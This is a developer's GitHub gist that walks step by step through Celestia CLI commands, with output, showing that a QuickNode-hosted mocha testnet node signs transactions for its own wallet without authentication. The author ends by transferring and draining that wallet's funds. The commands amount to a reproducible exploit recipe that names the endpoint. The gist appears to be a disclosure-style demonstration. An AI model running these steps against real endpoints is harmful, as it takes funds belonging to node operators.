Skip to content

Instantly share code, notes, and snippets.

@jcstein

jcstein/steps.md

Created March 12, 2025 18:10
Show Gist options
  • Save jcstein/7757c46101a291171ea936e970abddaa to your computer and use it in GitHub Desktop.
Save jcstein/7757c46101a291171ea936e970abddaa to your computer and use it in GitHub Desktop.
Download ZIP
playing around with quicknode endpoint and DA node
Raw
steps.md
  1. tried to submit a blob to the quicknode URL, which errors as expected bc no node store specified to get the auth token
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/
Error: cant access the auth token: token/node-store flag was not specified: no opened Node Store found (no node is running)
Usage:
  celestia blob submit [namespace] [blobData] [flags]
...
  1. query (what I thought was my) account address balance, account not found bc it isn't funded. I thought it was mine originally and didn't check the address against my keystore.
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4

{
  "result": "querying account my_celes_key: rpc error: code = NotFound desc = account celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw not found"
}
  1. then i mistakenly copied the quicknode mocha address from log above as the signer here
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": "querying account my_celes_key: rpc error: code = NotFound desc = account celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw not found"
}
  1. then I funded the account, checked the balance of my local key, it was still zero, weird (hadn't realized I funded the quicknode key yet)
celestia state balance --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "0"
  }
}
  1. then I spent from quicknode's wallet that I had funded, without accessing the node's keys:
celestia blob submit 0x6D6F76657465737431 'gmove' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": {
    "height": 5129364,
    "commitments": [
      "0xa9ab91516d6413ad9889c5dd596670c0206ae12314edf07b6dff5da5b97e1eda"
    ]
  }
}

I don't have this signer in my keyring, my keyring has celestia1glsg9w0p6d9qw6vv79xd0w6vav7sret9stpxuy and not celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw. See blobtx on Celenium: https://mocha.celenium.io/tx/b143f20e7721d2666c9080a0a9c9f95134ad5d589d612590766783061c5bf8f6?tab=messages

Then I check the balance of my node bc I'm confused how I posted a blob lol -- still zero

celestia state balance --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "0"
  }
}

Then I check balance of quicknode address:

celestia state balance-for-address celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "99999648"
  }
}

submit another blob

celestia blob submit 0x6D6F76657465737431 'youve been hacked' \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": {
    "height": 5129439,
    "commitments": [
      "0x118a55deab58e88da73b0bb1147bff5a97d178ec7be79422073a0f6e697fd088"
    ]
  }
}

check that balance goes down

celestia state balance-for-address celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4
{
  "result": {
    "denom": "utia",
    "amount": "99999472"
  }
}
  1. at this point I realize the quicknode endpoint doesn't have any protection on it and transfer funds back out as demo:
celestia state transfer celestia1glsg9w0p6d9qw6vv79xd0w6vav7sret9stpxuy 100000 \
  --url https://frosty-intensive-panorama.celestia-mocha.quiknode.pro/$APIKEY/ \
  --node.store $HOME/.celestia-light-mocha-4 --key.name my_celes_key \
  --signer celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw
{
  "result": {
    "height": 5129688,
    "txhash": "E860CF445BF0D261555C7509897D5E909E0B6776299EC40278A8162B73F2AEAF",
    "logs": null,
    "events": null
  }
}

which can be found at: https://mocha.celenium.io/tx/e860cf445bf0d261555c7509897d5e909e0b6776299ec40278a8162b73f2aeaf?tab=messages

where I sent from the FromAddress when I shouldn't have been able to:

 "FromAddress": "celestia1pe3zrtwc298gd5vn24vxq85acxe872c6ek2psw",
    "ToAddress": "celestia1glsg9w0p6d9qw6vv79xd0w6vav7sret9stpxuy"

then drained the wallet

https://mocha.celenium.io/tx/84407abc5a139b4dbf3ab7bc57ddca0789e916af84a98ba14fb45f1bb69d5bec?tab=messages

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment